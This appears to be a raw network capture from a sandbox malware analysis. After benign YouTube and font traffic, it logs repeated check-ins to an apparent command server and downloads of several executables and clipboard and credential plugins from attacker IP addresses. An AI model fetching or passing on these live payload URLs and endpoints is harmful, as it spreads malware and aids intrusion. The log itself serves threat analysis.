Network Analysis

GET / HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-KR User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: www.youtube.com Connection: Keep-Alive

HTTP/1.1 302 Found Content-Type: application/binary X-Content-Type-Options: nosniff Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 04 Jan 2024 22:49:40 GMT Location: https://www.youtube.com/supported_browsers?next_url=https%3A%2F%2Fwww.youtube.com%2F X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=31536000 Report-To: {"group":"youtube_main","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube_main"}]} Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="youtube_main" Origin-Trial: AvC9UlR6RDk2crliDsFl66RWLnTbHrDbp+DiY6AYz/PNQ4G4tdUTjrHYr2sghbkhGQAVxb7jaPTHpEVBz0uzQwkAAAB4eyJvcmlnaW4iOiJodHRwczovL3lvdXR1YmUuY29tOjQ0MyIsImZlYXR1cmUiOiJXZWJWaWV3WFJlcXVlc3RlZFdpdGhEZXByZWNhdGlvbiIsImV4cGlyeSI6MTcxOTUzMjc5OSwiaXNTdWJkb21haW4iOnRydWV9 Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000

GET /supported_browsers?next_url=https%3A%2F%2Fwww.youtube.com%2F HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-KR User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: www.youtube.com Connection: Keep-Alive

HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 X-Content-Type-Options: nosniff Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 04 Jan 2024 22:49:40 GMT Strict-Transport-Security: max-age=31536000 X-Frame-Options: SAMEORIGIN Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="youtube_main" Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=* Origin-Trial: AvC9UlR6RDk2crliDsFl66RWLnTbHrDbp+DiY6AYz/PNQ4G4tdUTjrHYr2sghbkhGQAVxb7jaPTHpEVBz0uzQwkAAAB4eyJvcmlnaW4iOiJodHRwczovL3lvdXR1YmUuY29tOjQ0MyIsImZlYXR1cmUiOiJXZWJWaWV3WFJlcXVlc3RlZFdpdGhEZXByZWNhdGlvbiIsImV4cGlyeSI6MTcxOTUzMjc5OSwiaXNTdWJkb21haW4iOnRydWV9 Report-To: {"group":"youtube_main","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube_main"}]} P3P: CP="This is not a P3P policy! See http://support.google.com/accounts/answer/151657?hl=ko for more info." Content-Encoding: gzip Server: ESF X-XSS-Protection: 0 Set-Cookie: hideBrowserUpgradeBox=true; Domain=.youtube.com; Expires=Thu, 18-Jan-2024 22:49:40 GMT; Path=/; Secure; HttpOnly Set-Cookie: YSC=E3vckHTUKX8; Domain=.youtube.com; Path=/; Secure; HttpOnly; SameSite=none Set-Cookie: VISITOR_INFO1_LIVE=QqrBdQiob3Y; Domain=.youtube.com; Expires=Tue, 02-Jul-2024 22:49:40 GMT; Path=/; Secure; HttpOnly; SameSite=none Set-Cookie: VISITOR_PRIVACY_METADATA=CgJLUhIEGgAgOg%3D%3D; Domain=.youtube.com; Expires=Tue, 02-Jul-2024 22:49:40 GMT; Path=/; Secure; HttpOnly; SameSite=lax Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Transfer-Encoding: chunked

GET /css?family=YouTube+Sans:500 HTTP/1.1 Accept: text/css Referer: https://www.youtube.com/supported_browsers?next_url=https%3A%2F%2Fwww.youtube.com%2F Accept-Language: ko-KR User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: fonts.googleapis.com Connection: Keep-Alive

HTTP/1.1 200 OK Content-Type: text/css; charset=utf-8 Access-Control-Allow-Origin: * Timing-Allow-Origin: * Expires: Thu, 04 Jan 2024 22:49:41 GMT Date: Thu, 04 Jan 2024 22:49:41 GMT Cache-Control: private, max-age=86400 Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin-allow-popups Content-Encoding: gzip Server: ESF X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Transfer-Encoding: chunked

GET /css?family=Roboto:400,500 HTTP/1.1 Accept: text/css Referer: https://www.youtube.com/supported_browsers?next_url=https%3A%2F%2Fwww.youtube.com%2F Accept-Language: ko-KR User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: fonts.googleapis.com Connection: Keep-Alive

HTTP/1.1 200 OK Content-Type: text/css; charset=utf-8 Access-Control-Allow-Origin: * Timing-Allow-Origin: * Expires: Thu, 04 Jan 2024 22:49:41 GMT Date: Thu, 04 Jan 2024 22:49:41 GMT Cache-Control: private, max-age=86400 Cross-Origin-Opener-Policy: same-origin-allow-popups Cross-Origin-Resource-Policy: cross-origin Content-Encoding: gzip Server: ESF X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Transfer-Encoding: chunked

GET /img/desktop/supported_browsers/yt_logo_rgb_light.png HTTP/1.1 Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5 Referer: https://www.youtube.com/supported_browsers?next_url=https%3A%2F%2Fwww.youtube.com%2F Accept-Language: ko-KR User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: www.youtube.com Connection: Keep-Alive Cookie: hideBrowserUpgradeBox=true; YSC=E3vckHTUKX8; VISITOR_INFO1_LIVE=QqrBdQiob3Y; VISITOR_PRIVACY_METADATA=CgJLUhIEGgAgOg%3D%3D

HTTP/1.1 200 OK Accept-Ranges: bytes Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="youtube-marketing" Report-To: {"group":"youtube-marketing","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube-marketing"}]} Content-Length: 9171 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Tue, 02 Jan 2024 04:55:16 GMT Expires: Wed, 01 Jan 2025 04:55:16 GMT Cache-Control: public, max-age=31536000 Age: 237266 Last-Modified: Wed, 16 Oct 2019 17:15:00 GMT Content-Type: image/png Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000

GET /img/desktop/supported_browsers/chrome.png HTTP/1.1 Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5 Referer: https://www.youtube.com/supported_browsers?next_url=https%3A%2F%2Fwww.youtube.com%2F Accept-Language: ko-KR User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: www.youtube.com Connection: Keep-Alive Cookie: hideBrowserUpgradeBox=true; YSC=E3vckHTUKX8; VISITOR_INFO1_LIVE=QqrBdQiob3Y; VISITOR_PRIVACY_METADATA=CgJLUhIEGgAgOg%3D%3D

HTTP/1.1 200 OK Accept-Ranges: bytes Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="youtube-marketing" Report-To: {"group":"youtube-marketing","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube-marketing"}]} Content-Length: 6213 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Tue, 02 Jan 2024 05:06:23 GMT Expires: Wed, 01 Jan 2025 05:06:23 GMT Cache-Control: public, max-age=31536000 Age: 236599 Last-Modified: Sun, 25 Jun 2023 02:58:00 GMT Content-Type: image/png Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000

GET /img/desktop/supported_browsers/dinosaur.png HTTP/1.1 Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5 Referer: https://www.youtube.com/supported_browsers?next_url=https%3A%2F%2Fwww.youtube.com%2F Accept-Language: ko-KR User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: www.youtube.com Connection: Keep-Alive Cookie: hideBrowserUpgradeBox=true; YSC=E3vckHTUKX8; VISITOR_INFO1_LIVE=QqrBdQiob3Y; VISITOR_PRIVACY_METADATA=CgJLUhIEGgAgOg%3D%3D

HTTP/1.1 200 OK Accept-Ranges: bytes Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="youtube-marketing" Report-To: {"group":"youtube-marketing","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube-marketing"}]} Content-Length: 59088 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Sun, 31 Dec 2023 23:44:37 GMT Expires: Mon, 30 Dec 2024 23:44:37 GMT Cache-Control: public, max-age=31536000 Age: 342305 Last-Modified: Wed, 16 Oct 2019 17:15:00 GMT Content-Type: image/png Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000

GET /s/roboto/v30/KFOmCnqEu92Fr1Mu4mxM.woff HTTP/1.1 Accept: */* Referer: https://www.youtube.com/supported_browsers?next_url=https%3A%2F%2Fwww.youtube.com%2F Accept-Language: ko-KR User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Origin: https://www.youtube.com Accept-Encoding: gzip, deflate Host: fonts.gstatic.com Connection: Keep-Alive

HTTP/1.1 200 OK Accept-Ranges: bytes Access-Control-Allow-Origin: * Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="apps-themes" Report-To: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]} Timing-Allow-Origin: * Content-Length: 20344 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Fri, 29 Dec 2023 21:03:29 GMT Expires: Sat, 28 Dec 2024 21:03:29 GMT Cache-Control: public, max-age=31536000 Age: 524773 Last-Modified: Wed, 11 May 2022 19:24:42 GMT Content-Type: font/woff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000

GET /img/desktop/supported_browsers/opera.png HTTP/1.1 Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5 Referer: https://www.youtube.com/supported_browsers?next_url=https%3A%2F%2Fwww.youtube.com%2F Accept-Language: ko-KR User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: www.youtube.com Connection: Keep-Alive Cookie: hideBrowserUpgradeBox=true; YSC=E3vckHTUKX8; VISITOR_INFO1_LIVE=QqrBdQiob3Y; VISITOR_PRIVACY_METADATA=CgJLUhIEGgAgOg%3D%3D

HTTP/1.1 200 OK Accept-Ranges: bytes Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="youtube-marketing" Report-To: {"group":"youtube-marketing","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube-marketing"}]} Content-Length: 2375 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Sun, 31 Dec 2023 23:50:44 GMT Expires: Mon, 30 Dec 2024 23:50:44 GMT Cache-Control: public, max-age=31536000 Age: 341939 Last-Modified: Wed, 16 Oct 2019 17:15:00 GMT Content-Type: image/png Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000

GET /s/youtubesans/v23/Qw3hZQNGEDjaO2m6tqIqX5E-AVS5_rSejo46_PCTRspJ0OosolrBEJL3HMXfxQASluL2m_dANVawBpSF.woff HTTP/1.1 Accept: */* Referer: https://www.youtube.com/supported_browsers?next_url=https%3A%2F%2Fwww.youtube.com%2F Accept-Language: ko-KR User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Origin: https://www.youtube.com Accept-Encoding: gzip, deflate Host: fonts.gstatic.com Connection: Keep-Alive

HTTP/1.1 200 OK Accept-Ranges: bytes Access-Control-Allow-Origin: * Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="apps-themes" Report-To: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]} Timing-Allow-Origin: * Content-Length: 18412 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Wed, 03 Jan 2024 22:49:35 GMT Expires: Thu, 02 Jan 2025 22:49:35 GMT Cache-Control: public, max-age=31536000 Age: 86408 Last-Modified: Mon, 27 Nov 2023 18:57:59 GMT Content-Type: font/woff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000

GET /img/desktop/supported_browsers/edgium.png HTTP/1.1 Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5 Referer: https://www.youtube.com/supported_browsers?next_url=https%3A%2F%2Fwww.youtube.com%2F Accept-Language: ko-KR User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: www.youtube.com Connection: Keep-Alive Cookie: hideBrowserUpgradeBox=true; YSC=E3vckHTUKX8; VISITOR_INFO1_LIVE=QqrBdQiob3Y; VISITOR_PRIVACY_METADATA=CgJLUhIEGgAgOg%3D%3D

HTTP/1.1 200 OK Accept-Ranges: bytes Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="youtube-marketing" Report-To: {"group":"youtube-marketing","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube-marketing"}]} Content-Length: 7121 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Tue, 02 Jan 2024 05:19:15 GMT Expires: Wed, 01 Jan 2025 05:19:15 GMT Cache-Control: public, max-age=31536000 Age: 235828 Last-Modified: Wed, 12 Feb 2020 21:45:00 GMT Content-Type: image/png Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000

GET /img/desktop/supported_browsers/firefox.png HTTP/1.1 Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5 Referer: https://www.youtube.com/supported_browsers?next_url=https%3A%2F%2Fwww.youtube.com%2F Accept-Language: ko-KR User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: www.youtube.com Connection: Keep-Alive Cookie: hideBrowserUpgradeBox=true; YSC=E3vckHTUKX8; VISITOR_INFO1_LIVE=QqrBdQiob3Y; VISITOR_PRIVACY_METADATA=CgJLUhIEGgAgOg%3D%3D

HTTP/1.1 200 OK Accept-Ranges: bytes Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="youtube-marketing" Report-To: {"group":"youtube-marketing","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube-marketing"}]} Content-Length: 9291 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Tue, 02 Jan 2024 05:03:16 GMT Expires: Wed, 01 Jan 2025 05:03:16 GMT Cache-Control: public, max-age=31536000 Age: 236787 Last-Modified: Sun, 25 Jun 2023 02:58:00 GMT Content-Type: image/png Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000

GET /favicon.ico HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Host: www.youtube.com Connection: Keep-Alive Cookie: hideBrowserUpgradeBox=true; YSC=E3vckHTUKX8; VISITOR_INFO1_LIVE=QqrBdQiob3Y; VISITOR_PRIVACY_METADATA=CgJLUhIEGgAgOg%3D%3D

HTTP/1.1 200 OK Accept-Ranges: bytes Content-Encoding: gzip Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="youtube-marketing" Report-To: {"group":"youtube-marketing","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube-marketing"}]} Content-Length: 180 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Tue, 02 Jan 2024 11:31:41 GMT Expires: Wed, 01 Jan 2025 11:31:41 GMT Cache-Control: public, max-age=31536000 Last-Modified: Sun, 25 Jun 2023 02:58:00 GMT Content-Type: image/x-icon Vary: Accept-Encoding Age: 213482 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000

GET /widget/demo/175.208.134.152 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=utf-8 Accept: application/json, text/plain, */* Referer: https://ipinfo.io/ Host: ipinfo.io Connection: Keep-Alive

HTTP/1.1 200 OK server: nginx/1.24.0 date: Thu, 04 Jan 2024 22:49:58 GMT content-type: application/json; charset=utf-8 Content-Length: 911 access-control-allow-origin: * x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff referrer-policy: strict-origin-when-cross-origin x-envoy-upstream-service-time: 2 via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000

GET /widget/demo/175.208.134.152 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=utf-8 Accept: application/json, text/plain, */* Referer: https://ipinfo.io/ Host: ipinfo.io Connection: Keep-Alive

HTTP/1.1 200 OK server: nginx/1.24.0 date: Thu, 04 Jan 2024 22:50:42 GMT content-type: application/json; charset=utf-8 Content-Length: 911 access-control-allow-origin: * x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff referrer-policy: strict-origin-when-cross-origin x-envoy-upstream-service-time: 2 via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-Robots-Tag: noindex Referrer-Policy: same-origin Last-Modified: Fri, 13 Oct 2023 16:28:31 GMT ETag: "37d-6079b8c0929c0" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Thu, 04 Jan 2024 23:49:58 GMT Date: Thu, 04 Jan 2024 22:49:58 GMT Connection: keep-alive

POST /theme/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.68 Content-Length: 4 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 04 Jan 2024 22:50:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive

POST /theme/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.68 Content-Length: 160 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 04 Jan 2024 22:50:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive

GET /mine/nocry.exe HTTP/1.1 Host: 77.91.68.21

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 04 Jan 2024 22:50:34 GMT Content-Type: application/octet-stream Content-Length: 876544 Last-Modified: Thu, 04 Jan 2024 21:23:53 GMT Connection: keep-alive ETag: "659721e9-d6000" Accept-Ranges: bytes

POST /theme/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.68 Content-Length: 31 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 04 Jan 2024 22:50:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive

GET /lend/golden.exe HTTP/1.1 Host: 77.91.68.21

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 04 Jan 2024 22:50:38 GMT Content-Type: application/octet-stream Content-Length: 374272 Last-Modified: Thu, 04 Jan 2024 20:35:29 GMT Connection: keep-alive ETag: "65971691-5b600" Accept-Ranges: bytes

GET /IE9CompatViewList.xml HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Host: ie9cvlist.ie.microsoft.com If-Modified-Since: Fri, 16 Oct 2020 17:54:09 GMT If-None-Match: 0x8D871FC7BDF491D Connection: Keep-Alive

HTTP/1.1 200 OK Content-Encoding: gzip Age: 20254 Cache-Control: max-age=21600 Content-MD5: p9g4jsuZO6TaLMVAI9ujVg== Content-Type: text/xml Date: Thu, 04 Jan 2024 22:50:39 GMT Etag: 0x8D9521D2D2DF1EC Last-Modified: Wed, 28 Jul 2021 23:12:31 GMT Server: ECAcc (tka/897A) Vary: Accept-Encoding X-Cache: HIT x-ms-blob-type: BlockBlob x-ms-lease-status: unlocked x-ms-request-id: 3b0deb7d-101e-0094-2131-3f8dcc000000 x-ms-version: 2009-09-19 Content-Length: 13702

POST /theme/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.68 Content-Length: 31 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 04 Jan 2024 22:50:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive

GET /lend/pixelguy.exe HTTP/1.1 Host: 77.91.68.21

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 04 Jan 2024 22:50:39 GMT Content-Type: application/octet-stream Content-Length: 307200 Last-Modified: Thu, 04 Jan 2024 20:35:37 GMT Connection: keep-alive ETag: "65971699-4b000" Accept-Ranges: bytes

POST /theme/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.68 Content-Length: 31 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 04 Jan 2024 22:50:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive

GET /lend/YT.exe HTTP/1.1 Host: 77.91.68.21

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 04 Jan 2024 22:50:41 GMT Content-Type: application/octet-stream Content-Length: 2314752 Last-Modified: Thu, 04 Jan 2024 20:35:50 GMT Connection: keep-alive ETag: "659716a6-235200" Accept-Ranges: bytes

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-Robots-Tag: noindex Referrer-Policy: same-origin Last-Modified: Fri, 13 Oct 2023 16:28:31 GMT ETag: "37d-6079b8c0929c0" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Thu, 04 Jan 2024 23:50:42 GMT Date: Thu, 04 Jan 2024 22:50:42 GMT Connection: keep-alive

GET /theme/Plugins/cred64.dll HTTP/1.1 Host: 185.215.113.68

HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Thu, 04 Jan 2024 22:50:43 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive

POST /theme/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.68 Content-Length: 31 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 04 Jan 2024 22:50:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive

GET /lend/MRK.exe HTTP/1.1 Host: 77.91.68.21

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 04 Jan 2024 22:50:45 GMT Content-Type: application/octet-stream Content-Length: 5472256 Last-Modified: Thu, 04 Jan 2024 20:35:36 GMT Connection: keep-alive ETag: "65971698-538000" Accept-Ranges: bytes

POST /theme/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.68 Content-Length: 31 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 04 Jan 2024 22:50:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive

GET /lend/macheri.exe HTTP/1.1 Host: 77.91.68.21

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 04 Jan 2024 22:50:52 GMT Content-Type: application/octet-stream Content-Length: 8455680 Last-Modified: Thu, 04 Jan 2024 20:35:31 GMT Connection: keep-alive ETag: "65971693-810600" Accept-Ranges: bytes

GET /theme/Plugins/clip64.dll HTTP/1.1 Host: 185.215.113.68

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 04 Jan 2024 22:50:53 GMT Content-Type: application/octet-stream Content-Length: 104448 Last-Modified: Thu, 04 Jan 2024 19:50:16 GMT Connection: keep-alive ETag: "65970bf8-19800" Accept-Ranges: bytes

POST /theme/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.68 Content-Length: 5 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 04 Jan 2024 22:50:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive

POST /theme/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.68 Content-Length: 31 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 04 Jan 2024 22:51:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive

GET /lend/bakhtiar.exe HTTP/1.1 Host: 77.91.68.21

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 04 Jan 2024 22:51:03 GMT Content-Type: application/octet-stream Content-Length: 4748648 Last-Modified: Thu, 04 Jan 2024 20:35:28 GMT Connection: keep-alive ETag: "65971690-487568" Accept-Ranges: bytes

POST /theme/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.68 Content-Length: 31 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 04 Jan 2024 22:51:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive

GET /newrock.exe HTTP/1.1 Host: 5.42.66.0

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 04 Jan 2024 22:51:10 GMT Content-Type: application/octet-stream Content-Length: 6802432 Last-Modified: Thu, 04 Jan 2024 20:05:01 GMT Connection: keep-alive ETag: "65970f6d-67cc00" Accept-Ranges: bytes

POST /theme/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.68 Content-Length: 31 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 04 Jan 2024 22:51:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive

GET /lend/flesh.exe HTTP/1.1 Host: 77.91.68.21

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 04 Jan 2024 22:51:21 GMT Content-Type: application/octet-stream Content-Length: 350720 Last-Modified: Thu, 04 Jan 2024 21:44:37 GMT Connection: keep-alive ETag: "659726c5-55a00" Accept-Ranges: bytes

